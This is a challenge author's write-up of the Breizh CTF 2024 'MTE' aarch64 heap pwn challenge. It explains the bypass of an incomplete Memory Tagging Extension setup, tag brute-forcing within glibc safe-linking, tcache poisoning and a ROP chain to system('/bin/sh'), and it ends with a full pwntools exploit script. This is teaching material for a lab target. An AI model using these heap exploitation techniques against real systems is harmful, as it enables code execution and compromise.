Breizh CTF 2024 - Write-up MTE - Pwn

Here is the write-up of the MTE challenge, which I created for Breizh CTF 2024. It is a pwn challenge rated difficult/very difficult.

Description

Do you know MTE? It's a new feature on the latest ARM CPUs, no more exploitation in the heap, what happiness!

I've implemented it on top of glibc in a little binary emulated via qemu, so you can't pwn it, but ...

Reverse





For this challenge, we have an aarch64 binary, and the description tells us it implements MTE on top of glibc. First, what is MTE? MTE (Memory Tagging Extension) is an ARM hardware feature designed to protect memory, here the heap. The heap is managed through allocations and deallocations, and mistakes by developers lead to vulnerabilities such as overflows, use-after-free, double free, etc.

The principle is to use dedicated CPU instructions to tag memory regions, with one 4-bit tag per 16-byte granule. The matching tag is stored in the top byte of the pointer (bits 56-59), which is ignored when the address is translated. Every access to tagged memory must go through a pointer carrying the same tag, otherwise the CPU raises a tag check fault. This article explains it well, with good diagrams: https://hackmd.io/@mhyang/rJ5JOnWvv
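To make the pointer side of this concrete, the helpers below extract, strip and replace the 4-bit logical tag held in bits 56-59 of a 64-bit pointer. They are hypothetical helpers doing plain integer arithmetic, not real hardware access. The tagged heap address used later in the exploit, 0x400005500034ab0, carries tag 4.

```python
# Sketch: manipulate the MTE logical tag stored in bits 56-59 of a pointer.
# Pure integer arithmetic; no real tagged memory is involved.

TAG_SHIFT = 56
TAG_MASK = 0xF << TAG_SHIFT
ADDR_MASK = (1 << 56) - 1  # same mask as `a1 & 0xFFFFFFFFFFFFFF` in secure_free


def get_tag(ptr: int) -> int:
    """Return the 4-bit logical tag of a tagged pointer."""
    return (ptr >> TAG_SHIFT) & 0xF


def strip_tag(ptr: int) -> int:
    """Drop the whole top byte, keeping only the 56-bit address."""
    return ptr & ADDR_MASK


def set_tag(ptr: int, tag: int) -> int:
    """Return ptr with its logical tag replaced by `tag` (0x0-0xf)."""
    if not 0 <= tag <= 0xF:
        raise ValueError("MTE tags are 4 bits wide")
    return (ptr & ~TAG_MASK) | (tag << TAG_SHIFT)


if __name__ == "__main__":
    p = 0x400005500034ab0
    print(hex(get_tag(p)), hex(strip_tag(p)))  # 0x4 0x5500034ab0
    print(hex(set_tag(strip_tag(p), 0xB)))     # 0xb00005500034ab0
```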

This feature is quite strong and is likely to be a game changer for heap exploitation in the coming years. At the time of writing, MTE is only fully deployed in GrapheneOS, with its custom allocator, on the Google Pixel 8.



Now let’s use IDA to view the implementation:

There are some init function calls and a menu with the following options:

- Allocate data with the function secure_malloc (max size 0x100)
- Free data with the function secure_free (no check on the index)
- Edit the data of an allocation
- Print the data of an allocation
- Exit the program

There are not many checks: all allocations are stored in a global array holding the data size and the pointer to the data. At first glance, we could perform a use-after-free or a double free, but let's look at the secure_malloc and secure_free functions:

```c
__int64 __fastcall secure_malloc(unsigned int a1)
{
  char *v1; // x0

  v1 = (char *)malloc(a1);
  return mte_tag(v1 - 16, a1 + 16) + 16;
}

void __fastcall secure_free(__int64 a1, int a2)
{
  unsigned __int16 tag; // [xsp+26h] [xbp+26h]
  __int64 v4; // [xsp+28h] [xbp+28h]
  void *ptr; // [xsp+30h] [xbp+30h]

  v4 = a1 & 0xFFFFFFFFFFFFFFLL;
  tag = mte_get_tag(a1);
  do
    ptr = (void *)(mte_tag(v4 - 16, (unsigned int)(a2 + 16)) + 16);
  while ( tag == (unsigned __int16)mte_get_tag(ptr) );
  free(ptr);
}

__int64 __fastcall mte_tag(__int64 _X0, unsigned __int64 size)
{
  __int64 v9; // [xsp+8h] [xbp-18h]
  __int64 v10; // [xsp+10h] [xbp-10h]
  unsigned __int64 i; // [xsp+18h] [xbp-8h]

  __asm { IRG X0, X0 }
  v9 = _X0;
  v10 = _X0;
  for ( i = 0LL; i < size; i += 16LL )
  {
    _X0 = v10;
    __asm { STG X0, [X0],#0x10 }
  }
  return v9;
}
```

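The secure_malloc function uses glibc's malloc to allocate a chunk, then calls mte_tag to tag the zone and get back the tagged pointer. The IRG instruction inserts a random tag into the pointer, and STG stores that tag for one 16-byte granule of memory; the loop repeats it over the whole zone. Note that the tagged zone starts 16 bytes before the pointer returned by malloc (covering the chunk header) and spans size + 16 bytes.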

The secure_free function uses glibc's free to release the chunk, but before that it retags the chunk memory with a new tag, drawing again until the new tag differs from the old one.

There are no obvious vulnerabilities in the implementation. The only oddity is the 16 bytes of padding around the pointer returned by malloc, which may overwrite part of the tags of neighboring chunks. However, there is no heap overflow, and it would be complicated to do anything with this.

Tag reuse could have been a vulnerability (about a 1/16 chance of drawing the same tag again, which would allow a UAF), but the check on the newly generated tag prevents it.
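The tag lifecycle described above can be modelled in a few lines of Python. This is a toy simulation under stated assumptions, not the binary's code: TaggedHeap, TagFault and the (tag, address) pointer representation are hypothetical, tags are drawn uniformly from 0x1-0xf, and a mismatch raises an exception instead of a hardware fault.

```python
# Toy model of the tag lifecycle of secure_malloc / secure_free (hypothetical).
# Assumptions: tags drawn uniformly from 0x1-0xf, tags tracked per 16-byte
# granule, and a mismatch raises TagFault instead of a CPU tag check fault.
import random

GRANULE = 16


class TagFault(Exception):
    """Stands in for an MTE tag check fault."""


class TaggedHeap:
    def __init__(self, seed=None):
        self.rng = random.Random(seed)
        self.mem_tags = {}  # granule address -> allocation tag

    def _tag_range(self, addr, size, tag):
        # Mirrors the STG loop in mte_tag: one tag store per 16-byte granule.
        for off in range(0, size, GRANULE):
            self.mem_tags[addr + off] = tag

    def secure_malloc(self, addr, size):
        # `addr` plays the role of malloc's return value.
        tag = self.rng.randint(0x1, 0xF)
        # Tagging starts 16 bytes before the user pointer (chunk header).
        self._tag_range(addr - 16, size + 16, tag)
        return (tag, addr)  # a "tagged pointer"

    def secure_free(self, ptr, size):
        old_tag, addr = ptr
        new_tag = old_tag
        while new_tag == old_tag:  # redraw until the tag changes
            new_tag = self.rng.randint(0x1, 0xF)
        self._tag_range(addr - 16, size + 16, new_tag)
        return (new_tag, addr)  # the pointer actually handed to free()

    def access(self, ptr, offset=0):
        tag, addr = ptr
        granule = (addr + offset) & ~(GRANULE - 1)
        if self.mem_tags.get(granule) != tag:
            raise TagFault(f"tag mismatch at {addr + offset:#x}")
        return True


if __name__ == "__main__":
    heap = TaggedHeap(seed=1)
    p = heap.secure_malloc(0x1000, 0x80)
    heap.access(p)  # fine: pointer tag == memory tag
    heap.secure_free(p, 0x80)
    try:
        heap.access(p)  # use-after-free through the stale pointer
    except TagFault as e:
        print("caught:", e)
```

The pointer returned by secure_free matters later: it is the one passed to free(), so glibc sees the new tag, not the old one.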



Let's review the remaining functions for any unusual behavior or suspicious lines of code. At the start of the process function:

```c
v5 = (unsigned __int64)malloc(0x20uLL);
if ( mprotect((void *)(v5 & 0xFFFFFFFFFFFFF000LL), 0x21000uLL, 35) )
```

Why call mprotect? Basic MTE examples found online usually allocate the tagged zone with mmap (https://8ksec.io/arm64-reversing-and-exploitation-part-10-intro-to-arm-memory-tagging-extension-mte/).

They pass the PROT_MTE flag to enable MTE on the zone. As the hackmd article above, which also explains MTE, puts it:

> with a special flag, PROT_MTE, the reserved memory has tagging effects enabled

This flag activates the protection. In our case, it is set by the mprotect call, whose protection argument is 0x23 (0x20 = PROT_MTE):

```
Python>bin(0x23)
'0b100011'
Python>bin(0x20)
'0b100000'
```
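The same decoding can be done programmatically. The flag values below are those of arm64 Linux (PROT_MTE is arm64-specific); decode_prot is a small illustrative helper.

```python
# Decode an mprotect() prot value into flag names (arm64 Linux values).
PROT_FLAGS = {
    0x1: "PROT_READ",
    0x2: "PROT_WRITE",
    0x4: "PROT_EXEC",
    0x20: "PROT_MTE",  # arm64-only: enable tag checks on the mapping
}


def decode_prot(prot: int) -> list:
    names = [name for bit, name in PROT_FLAGS.items() if prot & bit]
    unknown = prot & ~sum(PROT_FLAGS)  # bits not covered by the table
    if unknown:
        names.append(f"unknown({unknown:#x})")
    return names


print(decode_prot(0x23))  # ['PROT_READ', 'PROT_WRITE', 'PROT_MTE']
```

So 0x23 (35 in the decompiled call) is PROT_READ | PROT_WRITE | PROT_MTE.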

The address passed to mprotect is a heap pointer (from the malloc call above) with its low 12 bits masked off, which here is the heap base address. The size is the initial size of the heap (0x21000). But wait: the heap is not fixed in size, it is dynamic and can grow. What if we make many allocations to expand the heap, then free a chunk, edit it (UAF) and check whether the program crashes?

It works! There is no crash: the freed chunk lies outside the range covered by mprotect, so its memory has no MTE properties and no tag check is triggered.

Indeed, when glibc extends the heap, the newly added pages do not get the PROT_MTE flag.
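A quick calculation shows why 500 allocations are enough. This sketch assumes every malloc(0x100) is carved fresh from the top chunk and ignores the chunks already present at the heap base, so the result is an upper bound; chunk_size and is_mte_protected are illustrative helpers, not part of the binary.

```python
# Back-of-the-envelope check: how many malloc(0x100) calls push the heap
# past the 0x21000 bytes covered by mprotect(..., PROT_MTE)?
import math

PROTECTED_SIZE = 0x21000
SIZE_SZ = 8            # size field on 64-bit
MALLOC_ALIGN = 16
MINSIZE = 0x20


def chunk_size(request: int) -> int:
    """glibc request2size on 64-bit: add the size field, round up to 16."""
    return max((request + SIZE_SZ + MALLOC_ALIGN - 1) & ~(MALLOC_ALIGN - 1), MINSIZE)


def is_mte_protected(addr: int, heap_base: int) -> bool:
    """True if addr lies in [heap_base, heap_base + 0x21000)."""
    return heap_base <= addr < heap_base + PROTECTED_SIZE


allocs_needed = math.ceil(PROTECTED_SIZE / chunk_size(0x100))
print(hex(chunk_size(0x100)), allocs_needed)  # 0x110 497
```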

```python
# grow up heap to bypass mprotect restricted range
for i in range(500):
    alloc(1,0x100,b"A")

alloc(2,0x80,b"A")
free(2)
edit(2,b"TEST")

io.interactive()
```

This lets us bypass the MTE protection and, for example, perform a use-after-free.

Exploitation

The key thing to notice is that the binary runs under qemu-aarch64 and the emulated aarch64 process has no ASLR, so heap, stack and libc addresses are the same on every run.

Since all allocations are limited to 0x100 bytes, freed chunks end up in the tcache bins or fastbins, which are singly linked lists. With the use-after-free, we can overwrite the forward pointer of a freed chunk to control where the next chunk is allocated.
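To illustrate why controlling the forward pointer is enough, here is a toy model of a tcache bin as a LIFO singly linked list, without safe-linking for now. ToyTcacheBin and its dict-based memory are hypothetical. Real glibc also keeps a per-bin counter and only serves from tcache while it is non-zero, which is why the exploit frees two chunks before allocating twice.

```python
# Toy model of a tcache bin: a LIFO singly linked list (no safe-linking).
# `memory` maps a chunk address to the `next` pointer stored in that chunk.

class ToyTcacheBin:
    def __init__(self):
        self.head = None
        self.count = 0     # glibc keeps a similar per-bin counter
        self.memory = {}

    def free(self, chunk):
        self.memory[chunk] = self.head  # chunk->next = old head
        self.head = chunk
        self.count += 1

    def malloc(self):
        if self.count == 0:
            return None  # glibc would fall back to the other bins here
        chunk = self.head
        self.head = self.memory.get(chunk)  # follow chunk->next
        self.count -= 1
        return chunk


if __name__ == "__main__":
    tbin = ToyTcacheBin()
    tbin.free(0x1000)               # chunk 2
    tbin.free(0x1100)               # chunk 3, now at the head
    tbin.memory[0x1100] = 0xdead0   # UAF: overwrite chunk 3's next pointer
    print(hex(tbin.malloc()))       # 0x1100 (chunk 3 again)
    print(hex(tbin.malloc()))       # 0xdead0 (attacker-chosen address)
```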

Which libc version is used? GNU C Library (Ubuntu GLIBC 2.35-0ubuntu1) stable release version 2.35.

This version implements heap safe-linking (introduced in glibc 2.32), so we have to deal with it.

The idea is to protect the fd pointer of free chunks in these bins with a mangling operation, making it harder to overwrite it with an arbitrary value.

Here are the macros:

```c
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)
```

Here pos is the address where the pointer is stored (the next field of the freed chunk, i.e. the pointer passed to free) and ptr is the pointer being protected; the key is pos >> 12. Since pos is the heap pointer used when free is called, it carries the MTE tag set by secure_free, so the tag ends up in the key. The tag is a 4-bit value (from 0x1 to 0xf), and we have no leak, so we have to bruteforce it to forge the mangled pointer that makes the next allocation land where we want. With about one chance in sixteen per attempt, that's not bad.
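The two macros translate directly to Python. In this sketch, protect_ptr and reveal_ptr are hypothetical names mirroring PROTECT_PTR and REVEAL_PTR, and tcache_next_is_aligned mirrors the alignment check that glibc 2.35's tcache_get performs on the chunk it returns, which means the target address must be 16-byte aligned. The addresses come from the final script.

```python
# Python port of glibc's safe-linking macros (glibc >= 2.32).
# pos: address of the field storing the pointer (the freed chunk's user
#      pointer, MTE tag included); ptr: the pointer value being protected.

def protect_ptr(pos: int, ptr: int) -> int:
    return (pos >> 12) ^ ptr


def reveal_ptr(pos: int, stored: int) -> int:
    # REVEAL_PTR(ptr) is PROTECT_PTR(&ptr, ptr): the XOR undoes itself.
    return protect_ptr(pos, stored)


def tcache_next_is_aligned(ptr: int) -> bool:
    # glibc 2.35 aborts with "malloc(): unaligned tcache chunk detected"
    # when tcache_get() is about to return a chunk that is not 16-byte aligned.
    return (ptr & 0xF) == 0


if __name__ == "__main__":
    pos = 0x400005500034ab0   # tagged address of the freed chunk (tag 4)
    target = 0x5501813cf0     # where we want the next allocation
    stored = protect_ptr(pos, target)
    assert reveal_ptr(pos, stored) == target
    assert tcache_next_is_aligned(target)
    print(hex(stored))
```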

We only need the address of the chunk freed by secure_free (whose fd we overwrite), combined with a guessed tag, and to mangle our target destination with it to build the forged fd.
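Since the tag drawn by secure_free right before free() is unknown, the bruteforce boils down to guessing one of the candidate fd values below. This sketch reuses the addresses hardcoded in the final script; reading 0x5500034ab0 as the untagged address of the freed chunk is an interpretation of that constant, and tagged and candidates are illustrative helpers.

```python
# Enumerate the mangled fd value for every possible MTE tag of the freed chunk.
# The exploit hardcodes one guess (tag 4) and reconnects until the tag drawn
# at runtime matches it.
FREED_CHUNK = 0x5500034ab0  # untagged freed-chunk address (fixed: no ASLR under qemu)
TARGET = 0x5501813cf0       # stack address targeted by the exploit


def tagged(addr: int, tag: int) -> int:
    """Put a 4-bit MTE tag in bits 56-59 of addr."""
    return addr | (tag << 56)


def candidates(addr: int, target: int) -> dict:
    """Map each possible tag (0x1-0xf) to the fd value to write with edit()."""
    return {tag: target ^ (tagged(addr, tag) >> 12) for tag in range(0x1, 0x10)}


if __name__ == "__main__":
    for tag, fd in candidates(FREED_CHUNK, TARGET).items():
        print(f"tag {tag:#x}: fd = {fd:#x}")
```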

Where should we allocate? We now have an arbitrary write, and the simplest way to get a shell is to overwrite the saved return address of the main function with our ROP chain.

As for what to write there, there is no handy gadget in the aarch64 glibc 2.35, so we need to find a good candidate to build a ROP chain calling system("/bin/sh").

There is a perfect one that I already used in this challenge: https://blog.itarow.xyz/posts/pacapable/

```
ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;
```

It loads the "/bin/sh" pointer stored at sp+0x18 into x0 (the first argument), then pops x29 and x30 from the stack and returns into x30, which we set to system.
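To double-check the payload layout, the sketch below replays main's epilogue and the gadget on a fake stack. It assumes, which the write-up does not state, that main's epilogue is ldp x29, x30, [sp], #0x10; ret with its frame record at the target address. The system and "/bin/sh" values are placeholders for the addresses resolved from libc in the script.

```python
# Replay main's epilogue and the gadget on a fake stack to check the payload.
# Assumption: main ends with `ldp x29, x30, [sp], #0x10; ret`, frame record at TARGET.
import struct

TARGET = 0x5501813cf0
LIBC = 0x5501860000
GADGET = LIBC + 0x69500  # ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret
SYSTEM = 0xAAAA          # placeholder for libc.sym['system']
BINSH = 0xBBBB           # placeholder for the "/bin/sh" string in libc


def p64(v: int) -> bytes:
    return struct.pack("<Q", v)


payload = b"A" * 8 + p64(GADGET) + p64(0xdead) + p64(SYSTEM) + p64(0xdead) + p64(BINSH)


def q(addr: int) -> int:
    """Read a little-endian qword from the fake stack mapped at TARGET."""
    return struct.unpack_from("<Q", payload, addr - TARGET)[0]


# main's epilogue: ldp x29, x30, [sp], #0x10; ret
sp = TARGET
x30 = q(sp + 8)
sp += 0x10
assert x30 == GADGET  # main returns into the gadget

# gadget: ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret
x0 = q(sp + 0x18)
x30 = q(sp + 8)
print(hex(x0), hex(x30))  # 0xbbbb 0xaaaa, i.e. system("/bin/sh")
```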



Running the exploit:

Flag : BZHCTF{DumB_1mpl_&_BF_R1P_MTE}

Final exploit

Here is the full script:

```python
#!/usr/bin/env python3
from pwn import *
import subprocess
import time
import sys

if len(sys.argv) < 3:
    print("Usage: solve.py <host> <port>")
    exit(1)

host, port = sys.argv[1], sys.argv[2]

context.terminal = ["tmux", "new-window"]
#context.log_level = 'info'

exe = ELF("./mte")
libc = ELF("./libc.so.6")
context.binary = exe

io = None

# change -l0 to -l1 for more gadgets
def one_gadget(filename, base_addr=0):
    return [(int(i)+base_addr) for i in subprocess.check_output(['one_gadget', '--raw', '-l0', filename]).decode().split(' ')]

def logbase(): log.info("libc base = %#x" % libc.address)
def logleak(name, val): info(name+" = %#x" % val)
def sla(delim,line): return io.sendlineafter(delim,line)
def sl(line): return io.sendline(line)
def rcu(delim): return io.recvuntil(delim)
def rcv(number): return io.recv(number)
def rcvl(): return io.recvline()

def conn():
    global io
    #if args.GDB:
    #    io = process(["qemu-aarch64","-g","1234",exe.path])
    #elif args.REMOTE:
    io = remote(host, int(port))
    #else:
    #    io = process(["qemu-aarch64",exe.path])
    return io

def alloc(index,size,data):
    sla(b"Print\n",b"1")
    sla(b":\n",str(index).encode())
    sla(b":\n",hex(size).encode())
    sla(b":\n",data)

def free(index):
    sla(b"Print\n",b"2")
    sla(b":\n",str(index).encode())

def edit(index,data):
    sla(b"Print\n",b"3")
    sla(b":\n",str(index).encode())
    sla(b":\n",data)

def print_alloc(index):
    sla(b"Print\n",b"4")
    sla(b":\n",str(index).encode())
    rcu(b": ")
    return rcvl()

def go_exit():
    sla(b"Print\n",b"5")

def obfuscate(p, adr):
    # safe-linking: PROTECT_PTR(adr, p)
    return p^(adr>>12)

while True:
    try:
        conn()

        # grow up heap to bypass mprotect restricted range
        for i in range(500):
            alloc(1,0x100,b"A")

        alloc(2,0x80,b"A")
        alloc(3,0x80,b"B")
        free(2)
        free(3)

        tcache_heap_addr = 0x400005500034ab0 # w/ MTE key (BF): guessed tag 4
        #tcache_heap_addr_DBG = int(input("[DBG] KEY : "),16)
        #tcache_heap_addr = tcache_heap_addr_DBG
        info(f'tcache_heap_addr @ {hex(tcache_heap_addr)}')

        targ = 0x005501813cf0
        obfu = obfuscate(targ,tcache_heap_addr)
        edit(3,p64(obfu))
        alloc(3,0x80,b"A")

        libc.address = 0x5501860000
        binsh = next(libc.search(b"/bin/sh\x00"))
        gadget = libc.address + 0x0000000000069500 # 0x0000000000069500 : ldr x0, [sp, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret
        system = libc.sym['system']
        data = b"A"*8 + p64(gadget) + p64(0xdead) + p64(system) + p64(0xdead) + p64(binsh)
        alloc(4,0x80,data)
        # data = print_alloc(1)

        go_exit()
        time.sleep(1)
        io.sendline(b"cat /flag*")
        io.interactive()
        break
    except Exception:
        # wrong tag guess: the remote process crashed, reconnect and retry
        # (Exception rather than a bare except, so Ctrl-C still stops the loop)
        if io:
            io.close()
        continue
```